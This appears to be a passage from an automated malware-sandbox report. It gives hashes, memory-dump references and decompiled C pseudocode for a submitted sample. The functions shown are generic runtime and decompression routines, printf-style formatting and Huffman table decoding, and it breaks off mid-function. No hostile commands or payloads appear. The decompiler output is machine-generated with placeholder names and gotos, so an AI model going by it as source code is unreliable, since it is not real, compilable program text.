Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction ID: cd191d819aa4a004f0084c347e70cdddcac7ce7ddcb1a0baf73092594e135436
Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction Fuzzy Hash: D2917B70A043498BEB24EF64C895BFE73D5EB80300F10892DE58B97283DB38A644E746

Uniqueness

Uniqueness Score: -1.00%

Function 00084969 Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 83%

			E00084969(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x9e668; // 0x136d1c5
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0008539B(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E0007EC4A(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00083C30(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E0008569B(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00083C30(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E0008557D(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00083C30(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E00085133(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00085310(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00084E99(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E0008527D(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E000852F1(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E00084CDC(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0008509B(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00084969
0x00084971
0x00084978
0x0008497d
0x0008497f
0x00084983
0x00084986
0x0008498a
0x0008498b
0x0008498e
0x000849fb
0x000849fe
0x00084a4d
0x00084a4d
0x00084a50
0x000849bc
0x000849be
0x000849c3
0x000849c5
0x00084a6b
0x00084a6e
0x00084bb4
0x00084bb6
0x00084bc5
0x00084bc5
0x00084a74
0x00084a79
0x00084a7c
0x00084a7f
0x00084a83
0x00084a89
0x00084a8a
0x00084a8c
0x00084ab6
0x00084ab6
0x00084aba
0x00084abd
0x00084ac7
0x00084ac9
0x00084acc
0x00084ace
0x00084ad4
0x00084ad4
0x00084ad6
0x00084ad6
0x00084ad9
0x00084ae7
0x00084ae7
0x00084ae9
0x00084aeb
0x00084aec
0x00084aee
0x00084af4
0x00084af6
0x00084af7
0x00084afc
0x00084aff
0x00084b0d
0x00084b0d
0x00084b0f
0x00084b0f
0x00084b1a
0x00084b1c
0x00084b21
0x00084b21
0x00084b24
0x00084b2a
0x00084b2c
0x00084b2f
0x00084b3f
0x00084b44
0x00084b44
0x00084b59
0x00084b5e
0x00084b61
0x00084b66
0x00084b69
0x00084b6b
0x00084b6d
0x00084b70
0x00084b73
0x00084b80
0x00084b85
0x00084b85
0x00084b73
0x00084b8c
0x00084b91
0x00084b94
0x00084b99
0x00084b9c
0x00084b9e
0x00084bab
0x00084bb0
0x00084b9e
0x00000000
0x00084bb3
0x00084b03
0x00084b04
0x00084b07
0x00000000
0x00000000
0x00084b09
0x00000000
0x00084b09
0x00084af0
0x00084af2
0x00000000
0x00000000
0x00000000
0x00084af2
0x00084add
0x00084ade
0x00084ae1
0x00000000
0x00000000
0x00084ae3
0x00000000
0x00084ae3
0x00000000
0x00084ad0
0x00084ac1
0x00084ac2
0x00084ac5
0x00000000
0x00000000
0x00000000
0x00084ac5
0x00084a90
0x00084a93
0x00084a95
0x00084aa0
0x00084aa2
0x00084aaa
0x00084aac
0x00084aae
0x00000000
0x00000000
0x00084ab0
0x00084ab4
0x00084ab4
0x00000000
0x00084ab4
0x00084aa4
0x00084a99
0x00084a99
0x00084a9a
0x00000000
0x00084a9a
0x00084a97
0x00000000
0x00084a97
0x000849cb
0x00000000
0x000849cb
0x00084a57
0x00084a57
0x00084a5a
0x00084a2c
0x00084a2c
0x00084a2d
0x00084a2f
0x00084a31
0x00000000
0x00084a31
0x00084a5c
0x00084a5f
0x00000000
0x00000000
0x00084a65
0x000849d4
0x000849d4
0x00000000
0x000849d4
0x00084a00
0x00084a43
0x00000000
0x00084a43
0x00084a02
0x00084a05
0x00084a38
0x00084a3a
0x00000000
0x00084a3a
0x00084a07
0x00084a0a
0x00084a28
0x00084a28
0x00084a28
0x00084a28
0x00000000
0x00084a28
0x00084a0c
0x00084a0f
0x00084a21
0x00000000
0x00084a21
0x00084a11
0x00084a14
0x00000000
0x00000000
0x00084a18
0x00000000
0x00084a18
0x00084990
0x00000000
0x00000000
0x00084996
0x00084998
0x000849d8
0x000849d8
0x000849db
0x000849f4
0x00000000
0x000849f4
0x000849dd
0x000849dd
0x000849e0
0x00000000
0x00000000
0x000849e3
0x000849e6
0x00000000
0x00000000
0x000849e8
0x000849eb
0x00000000
0x000849eb
0x0008499a
0x000849d2
0x00000000
0x000849d2
0x0008499e
0x00000000
0x00000000
0x000849a7
0x00000000
0x00000000
0x000849ac
0x00000000
0x00000000
0x000849b1
0x00000000
0x00000000
0x000849ba
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abbd112520c970f9ca7124aa41df9fdb8ff770e3e219c57374ef710165b3739
Instruction ID: fff909ddb9f3f1e775976f5d33b0e314c5afd97b3e5fa1d5abdd7cb61001ae78
Opcode Fuzzy Hash: 4abbd112520c970f9ca7124aa41df9fdb8ff770e3e219c57374ef710165b3739
Instruction Fuzzy Hash: 11617971680B0B66DEBCBA689895BFF33C8FB51704F140A1AE4C2DF282D651DD42C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00073D6D Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00073D6D(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E0006A7FB(_t168) >> 0x0000000c & 0x000000ff;
							E0006A7E4(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E0006A7FB(_t168) >> 0x0000000c & 0x000000ff;
							E0006A7E4(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00073076();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E0006A800(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E0006A7FB(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E0006A7FB(_t139) >> 0xd) + 3;
													_push(3);
												}
												E0006A7E4(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E0006A7FB(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E0006A7FB(_t139) >> 0xd) + 3;
												_push(3);
											}
											E0006A7E4(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E000747FB(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00073076();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00073076();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00073076();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00073076();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E000747FB(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

0x00073d7c
0x00073d7e
0x00073d88
0x00073d8f
0x00073d93
0x00073daf
0x00073db0
0x00073db0
0x00073db3
0x00073dc1
0x00073dc4
0x00073dc9
0x00073dcc
0x00073e05
0x00000000
0x00073e05
0x00073ddc
0x00073ddf
0x00073de4
0x00073de6
0x00073def
0x00073def
0x00073df2
0x00073df2
0x00073df3
0x00073df6
0x00000000
0x00000000
0x00073df8
0x00073dfd
0x00073dfe
0x00073e00
0x00000000
0x00000000
0x00000000
0x00073e00
0x00073e02
0x00000000
0x00073e02
0x00073de8
0x00073e09
0x00073e09
0x00073e0a
0x00073e0a
0x00073e1a
0x00073e1c
0x00073e24
0x00073e25
0x00073e26
0x00073e2a
0x00073e2f
0x00073e2f
0x00073e31
0x00073e31
0x00073e35
0x00073e53
0x00073e55
0x00073e5c
0x00073e62
0x00073e68
0x00073e6c
0x00073e99
0x00073e9a
0x00073e9b
0x00073e9f
0x00073ea1
0x00073ebc
0x00073ebf
0x00073ecb
0x00073ecd
0x00073ed1
0x00073ed6
0x00073ee2
0x00073ee4
0x00073ee6
0x00073ee8
0x00073ee8
0x00073eea
0x00073ef2
0x00073ef2
0x00073ef5
0x00073f01
0x00073f03
0x00073f06
0x00073f50
0x00073f6d
0x00073f6d
0x00073f70
0x00073f52
0x00073f5c
0x00073f5f
0x00073f5f
0x00073f74
0x00073f79
0x00073f79
0x00073f7a
0x00073f80
0x00000000
0x00000000
0x00073f82
0x00073f87
0x00073f88
0x00073f8a
0x00000000
0x00000000
0x00073f8c
0x00073f8c
0x00000000
0x00073f8c
0x00000000
0x00073f79
0x00073f08
0x00073f0b
0x00073f28
0x00073f28
0x00073f2b
0x00073f0d
0x00073f17
0x00073f1a
0x00073f1a
0x00073f2f
0x00073f34
0x00073f36
0x00073fb3
0x00073fb3
0x0007401a
0x0007401c
0x00000000
0x00073f38
0x00073f38
0x00073f38
0x00073f39
0x00073f3f
0x00000000
0x00000000
0x00073f45
0x00073f49
0x00073f4a
0x00073f4c
0x00000000
0x00000000
0x00000000
0x00073f4e
0x00000000
0x00073f38
0x00073f36
0x00073ef7
0x00073efb
0x00000000
0x00073efb
0x00073ea6
0x00073ea9
0x00073ea9
0x00073eab
0x00000000
0x00000000
0x00073ead
0x00073eae
0x00073eb1
0x00073eb4
0x00000000
0x00000000
0x00000000
0x00073eb6
0x00073eb8
0x00000000
0x00073eb8
0x00073e70
0x00073e73
0x00073e7d
0x00073e85
0x00073e8a
0x00073e8d
0x00000000
0x00073e8d
0x00073e40
0x00073e42
0x00000000
0x00000000
0x00073e46
0x00073e4b
0x00073e4d
0x00000000
0x00000000
0x00000000
0x00073f90
0x00073f90
0x00073f90
0x00073f9c
0x00073f9c
0x00073fa3
0x00073fa7
0x00073fb7
0x00073fb7
0x00073fc2
0x00073fc7
0x00073fc8
0x00073fcb
0x00073fd0
0x00073fda
0x00073fe2
0x00073fe3
0x00073fe8
0x00073ff2
0x00073ffa
0x00073ffb
0x00074000
0x00074008
0x00074010
0x00074013
0x00074018
0x00000000
0x00074018
0x00073fab
0x00073fb1
0x00000000
0x00000000
0x00000000
0x00073fb1
0x00073d9e
0x00073da0
0x00000000
0x00000000
0x00073da2
0x00073da7
0x00073da9
0x00000000
0x00000000
0x00000000
0x00073da9
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction ID: 9efa1c89d8d33f536b5e0badd234f2b0f1e8d49c9c2038651dd040dcbb982cd2
Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: 90711C71F043454FEB34DE28C8D4BAD77E5AB91304F00893DE58E8B283DA789A85975A

Uniqueness

Uniqueness Score: -1.00%

Function 0008473A Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E0008473A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00085328(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00083C04(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00085608(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00083C04(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E000854D6(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00083C04(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00085133(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00085310(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00084D3F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0008527D(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E000852F1(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00084C79(__ecx);
